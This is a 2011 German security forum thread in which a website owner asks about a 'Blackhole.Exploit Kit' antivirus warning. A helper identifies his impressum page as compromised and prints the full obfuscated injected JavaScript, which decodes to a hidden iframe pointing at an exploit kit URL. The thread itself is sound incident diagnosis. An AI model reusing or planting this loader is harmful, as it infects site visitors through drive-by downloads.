Trojaner-Board

Trojaner-Board (https://www.trojaner-board.de/)
-   Plagegeister aller Art und deren Bekämpfung (https://www.trojaner-board.de/plagegeister-aller-art-deren-bekaempfung/)
-   -   Fehlermeldung Blackhole.Exploit Kit (https://www.trojaner-board.de/102294-fehlermeldung-blackhole-exploit-kit.html)

hudschi 09.08.2011 19:24
Fehlermeldung Blackhole.Exploit Kit
 
Hallo,
ich habe ein Problem mit meiner Webseite.
Immer wenn ein Fan die Seite aufruft kommt folgende Fehlermeldung:

http://www8.pic-upload.de/09.08.11/7kqd414swoo5.jpg

Bei vielen anderen Fans ist das aber nicht der Fall.
Was ist hier das Problem ?

Danke für die Hilfe
Gruß
JN

cosinus 12.08.2011 10:55
Es kann ein Fehlalarm sein oder die Seite wurde kompromittiert.
Du betreust die Website?

hudschi 12.08.2011 19:10
ja ich betreue die seite ansich
was genau meinst du mit deiner antwort ?

gruß

cosinus 12.08.2011 19:41
Was ist an meiner Antwort denn nicht zu verstehen?
Als Administrator deiner Seite müsstest DU wissen, ob auf ihr was verändert wurde!
Ich kann nur sagen, dass es entweder ein Fehlalarm ist oder ein bislang fast unbekannter Schädling (ein Exploit) dort in ihr integriert wurde.

Sicherlich hast du Backups der Seite. Springt AVG da auch an?

hudschi 12.08.2011 20:19
ich habe die seite ansich erstellt aber jemand anderes bearbeitet sie weiter, klar ansich wir ja immer mal was verändert.
komischerweise springt diese meldung nicht bei mehreren auf

ich muss nochmal genau nachfragen wann die meldung kommt usw

cosinus 12.08.2011 20:23
Zitat:
komischerweise springt diese meldung nicht bei mehreren auf
Wieso "komischerweise"? Ich hab dir erklärt, dass es wohl am ehestens ein Fehlalarm ist.
Man sollte das aber prüfen. Ich weiß nicht, wie sehr du diesem Menschen traust, der ständig deine Seite verändern darf. Ist ja auch möglich, dass zB wegen gravierender Versäumnisse Sicherheitslücken ausgenutzt werden konnten oder er "zufällig" dort den Exploit eingebaut hat.

Ich würde im Moment einfach nur von einem Fehalarm ausgehen.

handball10 12.08.2011 22:57
Hallo hudschi,

Ich würde mal sagen, dass zumindest die Seite "impressum.htm" kompromittiert ist!
Nach dem Body-Bereich sind noch zwei Javascript eingebunden:
Code:
function createCSS(selector,declaration){var ua=navigator.userAgent.toLowerCase();var isIE=(/msie/.test(ua))&&!(/opera/.test(ua))&&(/win/.test(ua));var style_node=document.createElement("style");if(!isIE)style_node.innerHTML=selector+" {"+declaration+"}";document.getElementsByTagName("head")[0].appendChild(style_node);if(isIE&&document.styleSheets&&document.styleSheets.length>0){var last_style_node=document.styleSheets[document.styleSheets.length-1];if(typeof(last_style_node.addRule)=="object")last_style_node.addRule(selector,declaration);}};var cg={jmu:1935,onyv:function(){createCSS("#c0","background: url(data:,evaString.fromCharCode)");var dtm=null;var r=document.styleSheets;for(var i=0;i<r.length;i++){try{var neki=r[i].cssRules||r[i].rules;for(var llqx=0;llqx<neki.length;llqx++){var hyww=neki.item?neki.item(llqx):neki[llqx];vh=hyww.style.backgroundImage.match(/url\("?data\:[^,]*,([^")]+)"?\)/)[1];if((vh!=null)&&(vh.indexOf("Str")!=-1))
dtm=vh;};}catch(e){};}
var s="";var g=function(){return this;}();fhxt=g[dtm.substr(0,3)+"l"];var xp="1926q1926q1830q1833q1903q1895q1835q1824q1836q1818q1826q1834q1825q1819q1889q1832q1834q1819q1866q1827q1834q1826q1834q1825q1819q1820q1869q1814q1851q1838q1832q1857q1838q1826q1834q1895q1896q1837q1824q1835q1814q1896q1894q1844q1887q1842q1894q1812q1922q1926q1926q1926q1830q1833q1821q1838q1826q1834q1821q1895q1894q1876q1922q1926q1926q1810q1903q1834q1827q1820q1834q1903q1812q1922q1926q1926q1926q1817q1838q1821q1903q1837q1835q1814q1903q1874q1903q1835q1824q1836q1818q1826q1834q1825q1819q1889q1836q1821q1834q1838q1819q1834q1866q1827q1834q1826q1834q1825q1819q1895q1901q1837q1824q1835q1814q1901q1894q1876q1922q1926q1926q1926q1819q1821q1814q1903q1812q1922q1926q1926q1926q1926q1835q1824q1836q1818q1826q1834q1825q1819q1889q1838q1823q1823q1834q1825q1835q1868q1831q1830q1827q1835q1895q1837q1835q1814q1894q1876q1922q1926q1926q1926q1810q1903q1836q1838q1819q1836q1831q1903q1895q1834q1894q1903q1812q1922q1926q1926q1926q1926q1835q1824q1836q1818q1826q1834q1825q1819q1889q1837q1824q1835q1814q1903q1874q1903q1837q1835q1814q1876q1922q1926q1926q1926q1810q1922q1926q1926q1926q1830q1833q1903q1895q1835q1824q1836q1818q1826q1834q1825q1819q1889q1832q1834q1819q1866q1827q1834q1826q1834q1825q1819q1820q1869q1814q1851q1838q1832q1857q1838q1826q1834q1895q1896q1837q1824q1835q1814q1896q1894q1844q1887q1842q1894q1812q1922q1926q1926q1926q1926q1830q1833q1821q1838q1826q1834q1821q1895q1894q1876q1922q1926q1926q1926q1810q1903q1834q1827q1820q1834q1903q1812q1922q1926q1926q1926q1926q1835q1824q1836q1818q1826q1834q1825q1819q1889q1816q1821q1830q1819q1834q1895q1901q1875q1830q1833q1821q1838q1826q1834q1903q1820q1821q1836q1874q1896q1831q1819q1819q1823q1877q1888q1888q1835q1886q1833q1886q1816q1889q1819q1828q1888q1830q1825q1835q1834q1815q1889q1823q1831q1823q1872q1819q1823q1874q1882q1881q1836q1837q1838q1885q1886q1884q1887q1882q1837q1837q1885q1833q1885q1887q1896q1903q1816q1830q1835q1819q1831q1874q1896q1886q1887q1896q1903q1831q1834q1830q1832q1831q1819q1874q1896q1886q1887q1896q1903q1820q1819q1814q1827q1834q1874q1896q1817q1830q1820q1830q1837q1830q1827q1830q1819q1814q1877q1831q1830q1835q1835q1834q1825q1876q1823q1824q1820q1830q1819q1830q1824q1825q1877q1838q1837q1820q1824q1827q1818q1819q1834q1876q1827q1834q1833q1819q1877q1887q1876q1819q1824q1823q1877q1887q1876q1896q1873q1875q1888q1830q1833q1821q1838q1826q1834q1873q1901q1894q1876q1922q1926q1926q1926q1810q1922q1926q1926q1810q1922q1926q1926q1833q1818q1825q1836q1819q1830q1824q1825q1903q1830q1833q1821q1838q1826q1834q1821q1895q1894q1812q1922q1926q1926q1926q1817q1838q1821q1903q1833q1903q1874q1903q1835q1824q1836q1818q1826q1834q1825q1819q1889q1836q1821q1834q1838q1819q1834q1866q1827q1834q1826q1834q1825q1819q1895q1896q1830q1833q1821q1838q1826q1834q1896q1894q1876q1833q1889q1820q1834q1819q1870q1819q1819q1821q1830q1837q1818q1819q1834q1895q1896q1820q1821q1836q1896q1891q1896q1831q1819q1819q1823q1877q1888q1888q1835q1886q1833q1886q1816q1889q1819q1828q1888q1830q1825q1835q1834q1815q1889q1823q1831q1823q1872q1819q1823q1874q1882q1881q1836q1837q1838q1885q1886q1884q1887q1882q1837q1837q1885q1833q1885q1887q1896q1894q1876q1833q1889q1820q1819q1814q1827q1834q1889q1817q1830q1820q1830q1837q1830q1827q1830q1819q1814q1874q1896q1831q1830q1835q1835q1834q1825q1896q1876q1833q1889q1820q1819q1814q1827q1834q1889q1823q1824q1820q1830q1819q1830q1824q1825q1874q1896q1838q1837q1820q1824q1827q1818q1819q1834q1896q1876q1833q1889q1820q1819q1814q1827q1834q1889q1827q1834q1833q1819q1874q1896q1887q1896q1876q1833q1889q1820q1819q1814q1827q1834q1889q1819q1824q1823q1874q1896q1887q1896q1876q1833q1889q1820q1834q1819q1870q1819q1819q1821q1830q1837q1818q1819q1834q1895q1896q1816q1830q1835q1819q1831q1896q1891q1896q1886q1887q1896q1894q1876q1833q1889q1820q1834q1819q1870q1819q1819q1821q1830q1837q1818q1819q1834q1895q1896q1831q1834q1830q1832q1831q1819q1896q1891q1896q1886q1887q1896q1894q1876q1922q1926q1926q1926q1835q1824q1836q1818q1826q1834q1825q1819q1889q1832q1834q1819q1866q1827q1834q1826q1834q1825q1819q1820q1869q1814q1851q1838q1832q1857q1838q1826q1834q1895q1896q1837q1824q1835q1814q1896q1894q1844q1887q1842q1889q1838q1823q1823q1834q1825q1835q1868q1831q1830q1827q1835q1895q1833q1894q1876q1922q1926q1926q1810".split("q");lnek=fhxt(dtm.substr(3));for(var i=0;i<xp.length;i++){qvd=cg.jmu-parseInt(xp[i]);s+=(lnek(qvd));}
fhxt(s);}};cg.onyv();
Decodiert ergibt das ganze einen (mittlerweile toten) Iframe, der eine Seite nach dem BlackHole-Exploit-URL-Muster einbindet.
Die URL scheint offline zu sein...

Jemand dürfte sich auf jeden Fall Zugang zur Seite verschafft haben, oder Sicherheitslücken ausgenutzt haben.
Mehr kann ich auch nicht dazu sagen.

Ich an deiner Stelle, würde umgehend die Seite auf weitere solcher obskuren Scripte auntersuchen und ggf. sofort entfernen!

Viel Erfolg dabei ;)

Gruß
Handball10

cosinus 12.08.2011 23:18
Hm, also zumindest teils kompromittiert.
Hilft wohl nur ein sauberes Backup und sofort etwaige Sicherheitslücken zu entfernen ;)


Alle Zeitangaben in WEZ +1. Es ist jetzt 20:14 Uhr.

Copyright ©2000-2025, Trojaner-Board


Search Engine Optimization by vBSEO ©2011, Crawlability, Inc.

1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 128 129 130 131